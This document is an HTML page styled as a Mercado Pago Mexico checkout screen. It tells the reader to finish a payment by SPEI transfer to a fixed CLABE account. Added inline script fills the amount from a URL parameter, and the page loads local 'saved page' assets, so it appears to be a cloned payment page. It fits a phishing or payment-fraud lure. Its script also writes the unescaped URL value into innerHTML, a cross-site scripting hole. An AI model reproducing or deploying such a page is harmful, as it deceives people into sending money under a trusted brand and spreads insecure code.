
<!DOCTYPE html>
<html lang="es-MX">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width" />
<script src="./script.js"></script>
  <script >
  function getQueryVariable(variable)
{
       var query = window.location.search.substring(1);
       var vars = query.split("&");
       for (var i=0;i<vars.length;i++) {
               var pair = vars[i].split("=");
               if(pair[0] == variable){return pair[1];}
       }
       return(false);
}
</script>
<script>
 document.addEventListener("DOMContentLoaded",  función);
    
	function función() {
		var str1 = '<br/>';
		document.getElementById('mprecio').innerHTML = '$' + getQueryVariable('amount');
		document.getElementById('mprecio2').innerHTML = '$' + getQueryVariable('amount');
      }
   
    </script>  

<link href="https://api.mercadopago.com/preconnect" rel="preconnect" data-head-react="true"/><script type="text/javascript" nonce="4hpHByPjRnL+BXzWCW0k6A==">
        window.dataLayer = [];
        (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
        new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
        j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
        'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
        })(window,document,'script','dataLayer','GTM-T8N3BPH');
      </script><meta http-equiv="X-UA-Compatible" content="IE=edge" data-head-react="true"/><meta name="robots" content="noindex,noimageindex" data-head-react="true"/><link rel="preload" href="https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-light.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-head-react="true"/><link rel="preload" href="https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-regular.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-head-react="true"/><link rel="preload" href="https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-semibold.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-head-react="true"/><link rel="preload" href="https://http2.mlstatic.com/ui/webfonts/v4.2.0/roboto-mono/roboto-mono-400.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-head-react="true"/><title>Finalizá tu Pago</title><style>@font-face {
          font-family:'Proxima Nova';
          font-weight:300;
          font-style:normal;
          src:url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-light.woff2) format("woff2"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-light.woff) format("woff"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-light.ttf) format("truetype");
        }
        @font-face {
          font-family:'Proxima Nova';
          font-weight:400;
          font-style:normal;
          src:url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-regular.woff2) format("woff2"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-regular.woff) format("woff"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-regular.ttf) format("truetype");
        }
        @font-face {
          font-family:'Proxima Nova';
          font-weight:600;
          font-style:normal;
          src:url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-semibold.woff2) format("woff2"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-semibold.woff) format("woff"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-semibold.ttf) format("truetype");
        }</style>
<style>@font-face {
          font-family:'Roboto Mono';
          font-weight:400;
          font-style:normal;
          src:url(https://http2.mlstatic.com/ui/webfonts/v4.2.0/roboto-mono/roboto-mono-400.woff2) format("woff2"),
            url(https://http2.mlstatic.com/ui/webfonts/v4.2.0/roboto-mono/roboto-mono-400.woff) format("woff"),
            url(https://http2.mlstatic.com/ui/webfonts/v4.2.0/roboto-mono/roboto-mono-400.ttf) format("truetype");
        }</style>
<link href="https://http2.mlstatic.com/frontend-assets/px-checkout-frontend/payment-card.mlm.95e11102.css" rel="stylesheet" type="text/css" onerror="(window['_pfl'] = window['_pfl'] || []).push(['css', this.href])" />
<link href="https://http2.mlstatic.com/frontend-assets/px-checkout-frontend/payment-card-icon.mlm.815f6c2e.css" rel="stylesheet" type="text/css" onerror="(window['_pfl'] = window['_pfl'] || []).push(['css', this.href])" />
<link href="https://http2.mlstatic.com/frontend-assets/px-checkout-frontend/app.desktop.e3a63e68.css" rel="stylesheet" type="text/css" onerror="(window['_pfl'] = window['_pfl'] || []).push(['css', this.href])" />

</head><style>
  *:focus {
    box-shadow: 0 0 0 2px #fff, 0 0 0 3px #007EB5, 0 0 0 5px rgba(71, 154, 209, 0.3);
    outline: none;
  }

  *:focus-visible {
    box-shadow: 0 0 0 2px #fff, 0 0 0 3px #007EB5, 0 0 0 5px rgba(71, 154, 209, 0.3);
    outline: none;
  }

  *:focus:not(:focus-visible) {
    box-shadow: none;
    outline: none;
  }
</style>
<body class="redirect-view site-mlm windows step_congrats_instructions" data-no-turbolink="true" data-no-transition-cache="true"><noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-T8N3BPH" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript><style>
    .andes-dropdown__arrow::after {
      border-right-color: #009EE3 !important;
      border-bottom-color: #009EE3 !important;
    }
  
    .andes-badge--neutral,
    .andes-message__border-color--neutral {
      background-color: #009EE3;
    }
  
    .andes-radio__input:checked + .andes-radio__background .andes-radio__outer-circle {
      border-color: #009EE3;
    }

    .andes-radio__input:checked + .andes-radio__background .andes-radio__inner-circle {
      background-color: #009EE3;
    }
  
    .andes-list__item--selected::before {
      border-color: #009EE3;
    }
  
    .andes-switch .andes-checkbox__input:checked~.andes-checkbox__mimic:before {
      border-color: #009EE3;
      background-color: #009EE3;
    }
  
    .andes-form-control--focused .andes-form-control__border:after {
      background-color: #009EE3 !important;
    }
  
    .with-custom-color {
      color: #009EE3;
    }
  
    .item-installments_row_media .options-list__label .group-media-object div:nth-child(3) .text span,
    .item-installments_row_media .options-list__label .group-media-object .ui-avatar__content span {
      color: #009EE3;
    }

    #installments_group_generic .icon-wrapper .icon-installments span {
      color: #009EE3;
    }
  
    a, a:hover {
      color: #009EE3;
    }
  
    .options-list .options-list__item:not(.disabled, .with-action-text, .with-switch) .options-list__label::before {
      border-color: #009EE3;
    }

    .options-list .options-list__item input:checked + .options-list__label:not(.with-switch) {
      box-shadow: inset 0.25em 0 0 0 #009EE3;
    }

    .options-list .options-list__item.with-action-text .options-list__label .group-media-object div:nth-child(3) .text {
      color: #009EE3;
    }

    .options-list .options-list__label::before {
      border-right-color: #009EE3 !important;
      border-bottom-color: #009EE3 !important;
    }

    .more-cards__label {
      color: #009EE3;
    }
  
    .andes-button--loud {
      background: #009EE3;
      border-color: #009EE3;
      color: #fff;
    }

    .andes-button.andes-button--loud[data-loading='true'] {
      background: #009EE3 !important;
      border-color: #009EE3 !important;
      color: #fff !important;
    }

    .andes-button--transparent,
    .andes-button--secondary,
    :focus ~ .ui-select__status-arrow::after {
      border-color: #009EE3;
      color: #009EE3;
    }

    .andes-button--transparent svg path,
    .andes-button--secondary svg path,
    .andes-button--link svg path,
    .andes-button--quiet svg path,
    .andes-button--terciary svg path {
      fill: #009EE3;
    }

    .andes-button--link,
    .andes-button--quiet,
    .andes-button--terciary,
    .andes-button--link:hover,
    :focus + .ui-select__label,
    :focus ~ .ui-select__label {
      color: #009EE3;
    }

    .andes-button::after {
      background: hsl(198.20000000000005, 100%, 53.4%);
    }

    .andes-button--loud:hover {
      background: hsl(198.20000000000005, 100%, 39.2%);
      border-color: hsl(198.20000000000005, 100%, 39.2%);
      color: #fff
    }

    .andes-button--loud:active {
      background: hsl(198.20000000000005, 100%, 32.9%);
      border-color: hsl(198.20000000000005, 100%, 32.9%);
      color: #fff
    }
  </style><div class="layout layout--redirect"><main id="root-app" class="layout-main" role="main"><div class="page-mask"><link rel="stylesheet" type="text/css" href="./Finalizá tu Pago transfer spei_files/undefined"><div class="optimus"><div id="congrats_group" class="congrats congrats--instructions"><div class="scroller"><header class="congrats-header"><div class="congrats-header__container"><div class="congrats-titles"><h1 id="" class="c-title"><span>Para terminar solo falta que pagues 
  <span class="price--wrapper" id="mprecio">$ </span> desde Transferencia SPEI</span></h1></div><div class="avatar avatar--shopping-bag avatar--instructions"><svg xmlns="http://www.w3.org/2000/svg" width="28" height="27" viewBox="0 0 28 27" class="icon-shopping with-custom-color"><g fill="none" fill-rule="evenodd"><path stroke="#0db478" d="M3.941 26.196h20.17L21.751 7.32a.5.5 0 0 0-.496-.438H6.797a.5.5 0 0 0-.496.438L3.94 26.196z"></path><path stroke="#0db478" stroke-linecap="round" stroke-linejoin="round" d="M.712 26.204h26.662M18.336 10.19V4.654c0-5.39-8.62-5.353-8.62 0v5.534"></path><path fill="#0db478" fill-opacity=".4" d="M8.967 15.127H19.12l1.27 7.593H7.696z"></path></g></svg><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" class="icon-instructions-badge"><g fill="none" fill-rule="evenodd"><g transform="translate(-909 -97)"><g transform="translate(909 97)"><circle cx="15" cy="15" r="15" fill="#0D895C"></circle><circle cx="9" cy="15.5" r="2" fill="#fff"></circle><circle cx="15" cy="15.5" r="2" fill="#fff"></circle><circle cx="21" cy="15.5" r="2" fill="#fff"></circle></g></g></g></svg></div></div></header><div id="congrats_content_group" class="congrats-content"><div class="ui-card-wrapper" id="ui_card_group"><div class="ui-card"><h2 id="" class="title-hr"><span>Sigue estos pasos:</span></h2><ol class="ordered-list"><li><span class="order-list-number">1</span><div class="order-list-item"><div class="row-instructions"><div class="layout__col-content" id="group"><p id="" class="text"><span>Agrega a Mercado Pago como cuenta destino con estos datos:</span></p><p id="" class="text"><span>Tipo de cuenta:</span></p><h2 id="" class="title-h3"><span><b>CLABE interbancaria</b></span></h2><p id="" class="text"><span>Nombre del banco:</span></p><h2 id="" class="title-h3"><span><b>BBVA Bancomer</b></span></h2><p id="" class="text"><span>Número de cuenta / CLABE:</span></p><h2 id="" class="title-h3"><span><b>012914002006413757</b></span></h2><p id="" class="text"><span>Alias:</span></p><h2 id="" class="title-h3"><span><b>MXP Mercado Pago</b></span></h2></div></div></div></li><li><span class="order-list-number">2</span><div class="order-list-item"><div class="row-instructions"><div class="layout__col-content" id="group"><p id="" class="text"><span>Luego transfiere a “MXP Mercado Pago” y agrega:</span></p><p id="" class="text"><span>Monto exacto</span></p><h2 id="" class="title-h3"><span><b>
  <span class="price--wrapper" id="mprecio2">$ 10</span></b></span></h2><p id="" class="text"><span>Referencia</span></p><h2 id="" class="title-h3"><span><b>Primeros números del concepto</b></span></h2><p id="" class="text"><span>Concepto</span></p><h2 id="" class="title-h3"><span><b>101611907086</b></span></h2></div></div></div></li></ol><div class="layout__col-content" id="group"><p id="" class="text"><span><b>Tu pago se acreditará en menos de 1 hora.</b></span></p><p id="" class="text"><span>Te enviamos esta información por e-mail así la tienes a mano.</span></p><p id="" class="text"><span>En el detalle de tu cuenta puedes encontrarlo como un servicio de BBVA Bancomer.</span></p></div><div class="group-button"></div></div></div></div></div></div></div></div></main></div>
  
  </body></html>